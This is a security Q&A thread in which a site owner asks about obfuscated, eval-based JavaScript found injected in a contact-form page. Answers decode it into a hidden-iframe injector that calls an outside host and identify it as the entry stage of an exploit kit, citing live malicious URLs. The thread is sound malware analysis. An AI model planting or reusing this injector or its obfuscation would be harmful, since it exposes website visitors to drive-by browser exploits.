# Javascript containing a long hexadecimal string and eval: is this suspicious?

Tags: web-application, attacks, javascript, html

At the bottom of the `index.php` file for a simple “contact us” form, I found the following (some whitespace and newlines added):

```
try {if(window.document)--document.getElementById('12')}
catch(qq) {if(qq!=null)ss=eval("St"+"ring");}
a="74837c7182777d7c2e88888874747436372e89182e846f802e797a7171802e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e797a7171803c8180712e4b2e357682827e483d3d7c777c7d807d7b6f7c7d3c77823d525c5558867251653c7e767e3549182e797a7171803c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e797a7171803c8182877a733c707d807273802e4b2e353e3549182e797a7171803c8182877a733c7673777576822e4b2e35477e863549182e797a7171803c8182877a733c85777282762e4b2e35457e863549182e797a7171803c8182877a733c7a7374822e4b2e353f7e863549182e797a7171803c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c82508757723635797a7171803537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a35797a7171806a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c82508757723635797a71718035373c6f7e7e737c725176777a7236797a7171803749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";
z=[];
for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}
eval(ss["fr"+"omCharCode"].apply(ss,z));
</script><!--/0f2490-->
```

Anyone know what this code does? Is this likely to be an expected part of the page, or is it a sign that the website has been hacked?

Comment: Yes probably that site got "hacked"

Comment: No it is not hacked, it is obfuscation, so that you will not understand what it does. Search on google for JavaScript Obfuscation.

Comment: @AkashKava That doesn't mean the site wasn't hacked.

Comment: How can I safely test that code, to see what it does?

Comment: @Edward: replace the last `eval` with `console.log`.

Comment: @Edward you can run it in [jsfiddle](http://jsfiddle.net), I suppose.

Answer (score 6, accepted):

I found out what it does (please be lenient with me, **I am not a javascript developer**)

What can be easily seen, is that the script invokes `String.fromCharCode()` on the numbers present on the `a` string to create a new String, and execute it. The code the `a` string get's translated to is:

```
function zzzfff() {
 var klccr = document.createElement('iframe');

 klccr.src = 'http://ninoromano.it/DNGJxdCW.php';
 klccr.style.position = 'absolute';
 klccr.style.border = '0';
 klccr.style.height = '9px';
 klccr.style.width = '7px';
 klccr.style.left = '1px';
 klccr.style.top = '1px';

 if (!document.getElementById('klccr')) {
 document.write('<div id=\'klccr\'></div>');
 document.getElementById('klccr').appendChild(klccr);
 }
}

function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
```

Now, I am not sure about that (remember I am no javascript developer) but ***it seems to be code that steals cookies (session hijacking perhaps)***?

**EDIT**

On further research:

- The script is checking if there is a specific cookie present (`Name: "visited_uq", Content: "55", URL: "<current_url>", Path: "/", Expires: "24 hours after creation"`) and if it is not it creates it.
- It then creates a new element in the document, which it modifies to make it very difficult to notice (7 pixels width, 9 pixels height), and which runs a php script available at `http://ninoromano.it/DNGJxdCW.php`. If you visit this, it returns "ok" and nothing else in the page's code (the domain appears to be compromised). (I can't get any more information beyond that)

**Most likely it is a session hijacking attempt.**

Comment: fiddle: http://jsfiddle.net/YkDWJ/

Comment: Since this was in a index.php for a "contact us" form, what might be useful to a hacker to do session hijacking? Might it intercept the context if what the user filled out in the Contact Us form?

Comment: Thanks. I didn't know about Security.StackExchange.

Comment: I'm sorry, but this is incorrect. This is the iframe-loading stage of many infamous exploit kits; the cookie methods are simply to ensure that users don't load the iframe more than once.

Comment: @Anorov sorry, I didn't know about that one. I am by no means a security expert, and I also don't know anything web related (I'm a kernel hacker/compiler engineer). Feel free to edit my answer to correct it. :)

Answer (score 3):

The first time you run it, the script creates an iframe pointing at `ninoromano.it`. It then creates a cookie so that on subsequent times you load it, it doesn't run again.

The iframe is a browser exploit script. If you view it in a browser that it doesn't know about you just get the 'ok' string, but if you load it in, say, an older copy of IE, you get a whole bunch of exploits to infect your machine.

The site got hacked (and so did `ninoromano` by the looks of it). A common source of this kind of infection is client-side malware stealing server account passwords (often the same malware served by the exploits!). Whoever is responsible needs to scan all client machines that have accessed the server with multiple AVs (because AVs aren't very reliable); reinstall any infected clients from scratch; choose new server passwords; reinstall the server from scratch.

Answer (score 3):

What you are looking at is a packed (obfuscated) version of an exploit kit "iframer". "iframer" just means a snippet of Javascript that will load an external iframe; in most cases the iframe will point to some part of a chain that will eventually load a browser exploit kit.

(Obviously do not directly visit any of the below links.)

If you make a request to the exploit kit landing page, `hxxp://ninoromano.it/DNGJxdCW.php` with a valid referer and an IE user-agent, you will be redirected to another URL.

This is the redirection stage; `ninoromano.it` in this case is likely part of a "TDS", traffic distribution system: its job is to split traffic to different exploit kit landing pages (or sometimes generic spamvertising) based on the referer, and sometimes the country of the client.

http://www.symantec.com/connect/blogs/web-based-malware-distribution-channels-look-traffic-redistribution-systems

The loaded URL has a pattern similar to `hxxp://innocuus.myseniorbook.com:801/lace_poet_prolonged.htm`. Here is its content.

http://pastebin.com/gw20261S

Just by looking at that page, I already recognize this as the "Cool Exploit Kit". You can learn details about this exploit kit in various places:

http://www.avgthreatlabs.com/virus-and-malware-information/info/cool-exploit-kit/
http://malware.dontneedcoffee.com/2012/10/newcoolek.html
http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html

Another iframe is loaded by the landing page, `hxxp://innocuus.myseniorbook.com:801/who-solely_sex_painting.html`

This iframe contains the bulk of the actual malicious code. It attempts various exploits, primarily Java exploits, all of which will download and execute a malicious payload.

http://urlquery.net is a fantastic site for automating this kind of analysis. Just be sure to set an IE user-agenet and some sort of referer each time.

Many different exploit kits use that flavor of JS packer you are seeing at the bottom of the page. If you see any code that looks like that, you can assume it is very malicious.